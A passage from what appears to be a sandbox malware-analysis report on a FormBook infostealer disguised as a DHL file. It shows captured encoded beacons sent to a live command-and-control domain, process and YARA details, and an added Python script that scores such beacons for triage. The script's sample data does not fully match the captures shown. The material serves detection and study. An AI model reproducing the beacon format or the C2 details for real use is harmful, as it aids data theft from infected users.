                                                                            Dec 6, 2024 17:39:06.469820976 CET | 448 | IN | Data Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:06.469961882 CET | 1236 | IN | Data Raw: 52 42 83 57 22 f4 08 e7 a5 84 86 af 44 e8 11 ce 4b 09 8d 5e 89 d0 23 9c 97 12 ba 78 25 42 8f 70 5e 46 68 a1 95 65 16 fc de 95 17 41 f2 70 76 f6 06 3f 1d 6e 68 99 4c 99 b1 a0 b9 b9 f3 03 88 95 06 b2 28 ef df 84 4a 5a 90 d6 27 e7 e7 e3 2a 32 e3 91
                                                                            Data Ascii: RBW"DK^#x%Bp^FheApv?nhL(JZ'*2M}4dXOPDBF>2tSk0`)PH3IXh$<9sy^s=\\Wop-FO]g bp\.7I]*rKiY0X|=.~J.e?v
                                                                            Dec 6, 2024 17:39:06.469973087 CET | 1236 | IN | Data Raw: f7 f2 7b 62 94 e0 11 f9 ec 7a e8 fe 70 59 f7 6e 36 c7 6f b9 37 8c ac 24 f5 87 f9 fd ab 71 78 c2 4d be 54 12 d6 de 61 11 2f 9c 3f 56 44 3c f2 ef 41 c5 8f 55 58 98 85 2a ac db 51 c9 e8 f5 7a 3e 01 d4 5a 6c 89 4e ae 70 da fd cc 0e 13 3c 91 21 48 34
                                                                            Data Ascii: {bzpYn6o7$qxMTa/?VD<AUX*Qz>ZlNp<!H4>+ 1h3>:8btX(fk\MKx49pI*?1gEUh"'rwlH]"{5S@3\Ly"\yeNI*%b9UCk%xD>=
                                                                            Dec 6, 2024 17:39:06.469985008 CET | 1236 | IN | Data Raw: 6f 7f c6 82 5e 14 c3 4e ab 94 7d 74 72 cc e4 4b fb c4 8c 85 ec aa fd 59 c4 22 0f c2 1d 6c 53 04 51 81 86 57 82 4f 5f 2c 53 cc 62 06 bd f6 67 17 97 ec e2 b2 b7 83 cf ac ca 78 88 32 01 cb 5e 0c 1f 45 97 d7 cc 6d 63 c8 46 d7 3b f0 d2 19 ca a4 2c 7a
                                                                            Data Ascii: o^N}trKY"lSQWO_,Sbgx2^EmcF;,z1@m0GreP0FKPI!0;VgGXO~*w.UT:c6otYNi,[2J-e'8?&WGb%ivVxd:"q45Z"&lK%S
                                                                            Dec 6, 2024 17:39:06.470098019 CET | 1236 | IN | Data Raw: fa de 65 7b 78 81 ff 4f 35 9f 82 9e af 57 c1 e6 ae ed ca 0d dc a4 65 ec e8 12 fa 83 ab f6 f2 bb f1 c0 c5 35 0a 32 6c f7 ae 47 4f b5 0f 95 12 ae e7 8c e9 8c 9a 1c 42 ab 8b ec 68 c3 cb 21 f6 1a ba c5 6f 79 ae d7 ee f5 dd ea af 5b a4 bf ad 80 5b 0c
                                                                            Data Ascii: e{xO5We52lGOBh!oy[[J0\pXbs5Z}|(T:GR][4m-P:V?Gz)06VQ%}?QaNqW(ubBxWOB`Ur}_\1zOuC
                                                                            Dec 6, 2024 17:39:06.470109940 CET | 1236 | IN | Data Raw: 55 b3 c7 0e db 66 bb a8 e7 fa 34 c6 86 f0 a2 8e ee 93 00 5f d6 76 5e ce f0 2c 44 f4 87 b1 9a 71 09 d1 a7 4e b7 0f f5 d2 21 f7 70 5e 6f d6 58 c0 7d 6b b1 bd ee 83 a9 89 e6 d1 5e ea de 1a 90 59 87 09 9e 48 01 b1 5d 60 84 21 2b 77 5e 71 e2 52 e0 08
                                                                            Data Ascii: Uf4_v^,DqN!p^oX}k^YH]`!+w^qRv%1\t\#72lc{CJV'Yer~]4u-Z67jK@\j!{:M}2eI,8\PHZ#8K\yT4';EM>qo{k3r
                                                                            Dec 6, 2024 17:39:06.470123053 CET | 1236 | IN | Data Raw: 9f 8c 4c fb 35 d8 a1 92 56 33 63 3f 09 7d 05 72 0c ff d3 f8 6f 60 8e f5 18 bc 4e 8f 41 4d 0f 16 86 20 3f 4d a5 0a e2 30 f6 a7 29 b4 02 39 8c ff 69 ea ac 40 0e e3 0f 5f 03 7f 78 18 7f f4 1a f8 a3 1a fc 40 20 0c 0d 94 8e 40 af 80 b7 5e 8e 80 96 95
                                                                            Data Ascii: L5V3c?}ro`NAM ?M0)9i@_x@ @^u37)M4|,^^V L|)j^AE*V-f2y*HOwdY/rpGgV~v!iM0vOiQk0C%fuU|e|7
                                                                            Dec 6, 2024 17:39:06.470135927 CET | 1236 | IN | Data Raw: e9 7a 7d 82 86 c6 6a b0 61 7a ba 80 83 bf cb 28 3d ef ef d3 b6 f7 6f 21 e1 f0 ef 33 4b ff ef d3 76 f0 89 12 3e 02 1c 2e 3e 14 c6 f2 78 5e 66 82 b4 be 9b 00 68 00 76 06 f0 2c b2 15 15 b3 8d 5e b1 9d 69 94 4a 2a f7 53 15 82 80 0c 5b 19 1a 87 ec 7a
                                                                            Data Ascii: z}jaz(=o!3Kv>.>x^fhv,^iJ*S[zt=`00"`p}A?KACmsJZt"8-9jflkpv5v.%<cI TxGq\0.(ss~{vMg}1Fu-Y`@iP'nU^~4g69>nRIj
                                                                            Dec 6, 2024 17:39:06.589989901 CET | 1236 | IN | Data Raw: 23 d2 cc d8 3d 4d 81 27 a9 f5 49 cf eb 0f f3 fb d6 0a fa 38 d7 c1 f3 06 7f 2d b4 cd e4 a7 8e be 9c fd 24 05 2e 86 de c9 02 f4 5f 55 80 93 d1 3e 4d 80 9b ee c6 d9 95 c9 49 28 98 31 93 f3 59 4e 63 25 ad a1 42 85 4c 9c df 9e fd c1 bd d2 98 85 b0 58
                                                                            Data Ascii: #=M'I8-$._U>MI(1YNc%BLX2.9*2tx*q6c&c<6:-B(`BIUE>(E6Le^=cU.k%.w%;,7Biuf*-;y|_jCc:RO?w=t{p


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            43 | 192.168.2.12 | 50024 | 108.179.253.197 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:39:07.866719007 CET | 1838 | OUT | POST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 36 58 4e 6f 31 31 69 48 48 4b 4e 34 59 6c 6b 46 62 36 6b 53 44 69 79 64 63 42 62 50 4e 63 50 30 6b 61 47 43 30 72 79 52 6e 2b 70 4d 5a 50 6c 39 77 6e 65 36 67 48 59 4c 68 72 75 5a 31 4a 71 67 6c 77 57 66 61 58 74 33 41 6e 66 56 72 50 39 77 4a 48 54 36 4b 38 31 39 57 33 71 6f 52 37 53 54 57 6a 38 5a 74 34 76 44 41 31 4a 64 72 68 46 54 2b 4d 30 38 69 77 41 34 57 72 5a 4b 4e 42 46 77 6b 6e 77 6d 4b 74 39 56 30 71 42 65 69 36 6b 56 62 6e 32 69 45 5a 74 59 36 44 6e 57 36 55 6e 5a 31 59 53 69 74 6a 37 31 54 35 38 72 31 4c 53 78 70 54 43 6d 48 75 38 78 2b 6c 52 59 6f 2f 64 52 76 33 30 36 75 59 4d 36 5a 4c 74 69 34 57 52 51 77 74 51 34 4b 2f 57 6a 32 6a 59 4b 78 36 37 57 58 53 30 4a 2f 31 6d 48 5a 38 69 44 44 7a 63 6f 6d 57 50 72 59 45 49 76 44 4b 46 34 6a 6a 51 30 63 70 65 4a 4d 62 59 77 6d 49 2b 6f 34 4c 33 41 78 43 69 52 4f 34 4a 39 49 44 77 72 78 69 69 73 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWcloj6XNo11iHHKN4YlkFb6kSDiydcBbPNcP0kaGC0ryRn+pMZPl9wne6gHYLhruZ1JqglwWfaXt3AnfVrP9wJHT6K819W3qoR7STWj8Zt4vDA1JdrhFT+M08iwA4WrZKNBFwknwmKt9V0qBei6kVbn2iEZtY6DnW6UnZ1YSitj71T58r1LSxpTCmHu8x+lRYo/dRv306uYM6ZLti4WRQwtQ4K/Wj2jYKx67WXS0J/1mHZ8iDDzcomWPrYEIvDKF4jjQ0cpeJMbYwmI+o4L3AxCiRO4J9IDwrxiis [TRUNCATED]
                                                                            Dec 6, 2024 17:39:09.095515966 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:08 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:09.095557928 CET | 1236 | IN | Data Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                            Dec 6, 2024 17:39:09.095570087 CET | 1236 | IN | Data Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:09.095634937 CET | 1236 | IN | Data Raw: 9f 98 69 b2 58 66 55 fb 18 67 d8 7a 19 e9 0f b1 b9 7b 9f f1 c8 a6 d5 6b 75 5c e6 c6 5c 08 3f 2c b4 06 69 df b9 7d 8c d7 12 95 62 fa a5 ae 81 c2 56 eb 05 1f a2 d2 5a 04 38 26 68 bf 97 df 13 a3 04 8f c8 67 61 18 8e 57 76 b9 c0 b0 53 a3 66 16 2e 0d
                                                                            Data Ascii: iXfUgz{ku\\?,i}bVZ8&hgaWvSf.4strM.gUA~9Y>,8e^4! Ih5{5{7]-lKFW"\JM#f+}\i}DTI1']XR5nCoMr/3Q X]M'4UtE
                                                                            Dec 6, 2024 17:39:09.095675945 CET | 1236 | IN | Data Raw: e9 64 71 f6 e6 4d c4 4d 2e d8 dc 27 55 11 79 cb b3 5c 69 cb a4 1d e3 6d 80 56 00 ed 13 a9 6a ae 70 d3 29 8b d0 68 75 d7 29 f0 24 b5 3e e9 a1 57 77 6f aa 69 6a 2e 32 a6 13 2e 7d e2 11 af e3 5d 3e ba 5e 89 53 49 e3 13 ea 75 1e 63 04 2c bc 4b b4 2a
                                                                            Data Ascii: dqMM.'Uy\imVjp)hu)$>Wwoij.2.}]>^SIuc,K*dT*gQez\fz+J1Egwl\MNkvPVhEzO&v~<bWO&{0N,BX}Qg2td>~2s\Ln@h=!
                                                                            Dec 6, 2024 17:39:09.095691919 CET | 1236 | IN | Data Raw: f9 5b c1 34 f8 a4 37 3e 96 35 a4 03 9f 0c bb 83 a3 49 03 3a f4 c9 a0 3b 7c 22 a9 ef 92 fa 47 93 fa ae 5d ff 89 76 bd 0b 7a 8d bc 2f ba d7 47 d3 ae 31 d1 27 d7 dd de c5 5e 5a a8 84 42 9d 03 c1 c2 3b 9f 7c e6 95 9f fa 9c 70 ce 70 2b a2 e0 26 a5 89
                                                                            Data Ascii: [47>5I:;|"G]vz/G1'^ZB;|pp+&fsLgAp\RnQS34/"vY7SQqP't*@i&jXv%ap'E*~Da0:~'"j#v 1lzvReKF=80cL;|tV3c1W~
                                                                            Dec 6, 2024 17:39:09.095705032 CET | 1236 | IN | Data Raw: c4 ec 41 67 70 85 99 87 52 ae 30 65 d4 f1 2e 8e a4 f4 30 a5 57 73 9f b2 48 cd 28 95 cc 16 9a 09 9f 5c e4 f7 e5 f7 1a bf 3a 09 58 d3 6b 93 e5 7f a7 ff 88 e3 b2 3a 02 c8 11 be 8f 35 e5 63 e4 d5 54 0f 0f 55 e3 af ce 37 9d eb 6a 0f 76 56 85 15 5c 42
                                                                            Data Ascii: AgpR0e.0WsH(\:Xk:5cTU7jvV\B[N+hnX?z:qGPPssV>Z)K0v.DDP@}&x^fydL'\BnBwosEnV!)6#iVeOUi-<efE|yE@$OY[$OCnI
                                                                            Dec 6, 2024 17:39:09.095848083 CET | 1236 | IN | Data Raw: 6e 93 63 45 c4 15 89 79 52 73 07 59 00 d1 81 bb 84 09 01 7a 7e e0 96 67 2c 81 03 77 96 05 e2 d0 dd 94 47 b0 cd a6 b5 78 8e 0f 62 3c d3 98 65 5c cc eb 2a b6 ae 51 2a 15 cd 97 15 86 7f 04 9f 78 9d 2b 0d d9 f8 a1 93 32 83 6c 70 3d 55 8b 27 19 94 b9
                                                                            Data Ascii: ncEyRsYz~g,wGxb<e\*Q*x+2lp=U'-gILeMJ' RnD2#gh<g_57!:k_%KU@f29u{0~YORBOD+;9bS%-:{UqByUIbH.B_*i53DU1S
                                                                            Dec 6, 2024 17:39:09.095861912 CET | 1236 | IN | Data Raw: 54 ba 2c f1 89 54 12 5e 07 dc 4f d5 14 74 4d 8b 42 46 a0 9d 0a 87 fb 18 60 3a 4c c9 7e e0 fd 7b c1 02 10 ed 47 17 35 99 5c e6 85 3d 29 73 49 b8 d2 d8 f0 8f 70 d0 11 ee 12 fd 90 31 21 5a b8 fd 67 72 2f 19 b5 16 81 d2 38 3f d5 2c e2 85 f1 3b 83 81
                                                                            Data Ascii: T,T^OtMBF`:L~{G5\=)sIp1!Zgr/8?,;!vm?XZ\7$U#;'[JR^i53[xKY juMiP,oz&i6{cEhoI,q\ T9W$>SF lyKej- TY'uTM
                                                                            Dec 6, 2024 17:39:09.095874071 CET | 1236 | IN | Data Raw: 22 b7 67 8b e5 bd 69 f8 8b c6 1f 66 4a 47 b9 06 63 7e e9 72 44 d5 2c b4 7c ca ed bc e1 37 52 6b 73 ff 97 ee 2f dd 40 28 15 05 4c 30 19 42 c8 72 d3 41 9d f3 5f dc 30 5c 86 a2 88 00 8b 3f e0 37 e2 c6 fe d2 ad a8 d0 4c 45 85 80 7d 58 f7 1a c1 7d 27
                                                                            Data Ascii: "gifJGc~rD,|7Rks/@(L0BrA_0\?7LE}X}'~z]WupvDB!v:T";WQ+IlUW8y5+y7G-k3%"9cc`lX16jsMh^121
                                                                            Dec 6, 2024 17:39:09.217664957 CET | 1236 | IN | Data Raw: dc 54 a4 4c 46 02 5c cd 7f ad ae ca 9a db 1b 33 4d c8 8c 47 36 9d 34 fa c3 06 49 c1 39 a2 3a df 67 42 e2 08 a9 b5 b9 df ed ce 66 b3 ce 6c d0 51 3a e9 f6 3d cf eb 62 61 83 4c 39 cc be 56 f7 93 86 47 3c d2 1f 12 57 56 09 c5 a3 08 b0 bd d5 05 34 48
                                                                            Data Ascii: TLF\3MG64I9:gBflQ:=baL9VG<WV4H\t,q5V4z=g';jv[JsWBpGF"&hoo9%uU[a,\FuEk!N2!|kUnH]UkYeTP~BY8gB%{{q.


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            44 | 192.168.2.12 | 50025 | 108.179.253.197 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:39:10.528973103 CET | 523 | OUT | GET /qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:39:11.746264935 CET | 560 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 06 Dec 2024 16:39:11 GMT
                                                                            Server: nginx/1.23.4
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 0
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Location: http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ=
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            X-Server-Cache: true
                                                                            X-Proxy-Cache: MISS
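
The three sessions above share one beacon shape: a POST or GET to /qimy/ on www.bloodbalancecaps.shop carrying a single base64-looking field named BHptZ6F, a Macintosh Chrome/39 User-Agent sent by a Windows process, Connection: close, and (on the POSTs) an Origin and Referer that point back at the request path itself; the WordPress site behind it answers 404 with a full page. The script below is an added example, not code from the report or from Joe Sandbox: it parses requests of that shape and scores those observations as triage indicators. The request texts are constructed from the sessions above (first POST body in full, second POST body cut to the first 96 characters of its value, GET query as captured); the indicator names, the /[a-z0-9]{2,8}/ path pattern, the 64-character field length and the threshold of three indicators are this example's own heuristics, not a vendor signature.

```python
"""Triage of FormBook-style HTTP beacons, modelled on the sessions above.

Added example (not Joe Sandbox code). Requests are constructed from the
captured sessions; indicator names and thresholds are this example's own.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlsplit

UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36")
HOST = "www.bloodbalancecaps.shop"

# First POST body exactly as captured (Content-Length: 224).
POST_BODY_1 = (
    "BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWclojyXMfd1jgbKcIYllFbnkSC6"
    "ydE7bPIpP3caFgsr+wn+jMZPtdxABqgeYLxvuZFJqglwWcCX9WAndVrM6wJbX6Lp19ONqoVr"
    "SHij8594px41AdrjJz+E08vuA4LFZLokFwcn0CLnoR02DJSZqHPivEEBmK76qgDzlcdqcy0t"
    "mGP9je8=")
# Second POST body, cut after 96 value characters (the report truncates it).
POST_BODY_2 = (
    "BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWcloj6XNo11iHHKN4YlkFb6kSDi"
    "ydcBbPNcP0kaGC0ryRn+pMZPl9wne6gH")
GET_TARGET = ("/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6"
              "hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ=")


def _post(body: str) -> str:
    """Constructed POST in the captured header layout (headers not used below are omitted)."""
    return ("POST /qimy/ HTTP/1.1\r\n"
            f"Host: {HOST}\r\nOrigin: http://{HOST}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\nReferer: http://{HOST}/qimy/\r\n"
            f"User-Agent: {UA}\r\n\r\n" + body)


SAMPLE_REQUESTS = [
    _post(POST_BODY_1),
    _post(POST_BODY_2),
    f"GET {GET_TARGET} HTTP/1.1\r\nHost: {HOST}\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n",
]

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")   # heuristic: one short directory, like /qimy/


@dataclass
class Beacon:
    method: str
    path: str
    host: str
    headers: Dict[str, str]
    fields: Dict[str, str]                     # form or query fields, '+' preserved
    indicators: List[str] = field(default_factory=list)


def split_form(s: str) -> Dict[str, str]:
    """Split a=b&c=d by hand: parse_qs would rewrite the '+' inside base64 values as spaces."""
    out: Dict[str, str] = {}
    for part in s.split("&"):
        if part:
            k, _, v = part.partition("=")
            out[k] = v
    return out


def parse_request(raw: str) -> Beacon:
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    url = urlsplit(target)
    fields = split_form(url.query) if method == "GET" else split_form(body)
    return Beacon(method, url.path, headers.get("host", ""), headers, fields)


def score(b: Beacon, host_os: str = "Windows") -> Beacon:
    ua = b.headers.get("user-agent", "")
    if host_os == "Windows" and "Macintosh" in ua:      # a Windows PE claiming to be a Mac browser
        b.indicators.append("ua_os_mismatch")
    if b.headers.get("connection", "").lower() == "close":
        b.indicators.append("connection_close")
    if SHORT_DIR.match(b.path):
        b.indicators.append("short_dir_path")
    ref = urlsplit(b.headers.get("referer", ""))
    if ref.netloc and ref.netloc == b.host and ref.path == b.path:   # Referer is the request itself
        b.indicators.append("self_referer")
    if any(len(v) >= 64 and len(v) % 4 == 0 and B64.match(v) for v in b.fields.values()):
        b.indicators.append("long_base64_field")
    return b


def is_suspect(b: Beacon, threshold: int = 3) -> bool:
    return len(b.indicators) >= threshold


def triage(raws: List[str], host_os: str = "Windows") -> List[Beacon]:
    return [score(parse_request(r), host_os) for r in raws]


def decoded_payload_len(b: Beacon, name: str = "BHptZ6F") -> Optional[int]:
    """Length of the base64-decoded field, or None if it is not valid base64 (e.g. truncated)."""
    v = b.fields.get(name)
    if v is None:
        return None
    try:
        return len(base64.b64decode(v, validate=True))
    except (binascii.Error, ValueError):
        return None


def shared_prefix_len(values: List[str]) -> int:
    """Characters all values have in common from the start; a cheap key for grouping beacons."""
    n = 0
    for chars in zip(*values):
        if len(set(chars)) != 1:
            break
        n += 1
    return n


if __name__ == "__main__":
    beacons = triage(SAMPLE_REQUESTS)
    for b in beacons:
        print(b.method, b.path, decoded_payload_len(b), is_suspect(b), b.indicators)
    print("shared value prefix:", shared_prefix_len([b.fields["BHptZ6F"] for b in beacons[:2]]))
```

The splitter deliberately avoids urllib's parse_qs because the captured values contain '+' as base64 data, which parse_qs would turn into spaces and break decoding. With the values kept intact, the first POST field decodes to 161 bytes, and the two POST values from this process start with the same 42 characters, which is enough to group the beacons of one process in proxy logs without understanding the encrypted payload.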


                                                                            Target ID:0
                                                                            Start time:11:35:08
                                                                            Start date:06/12/2024
                                                                            Path:C:\Users\user\Desktop\DHL_734825510.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DHL_734825510.exe"
                                                                            Imagebase:0x6e0000
                                                                            File size:743'936 bytes
                                                                            MD5 hash:3AAE187307A535DF90ED8F9FAA0341D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:11:35:12
                                                                            Start date:06/12/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DHL_734825510.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:11:35:31
                                                                            Start date:06/12/2024
                                                                            Path:C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe"
                                                                            Imagebase:0xcb0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
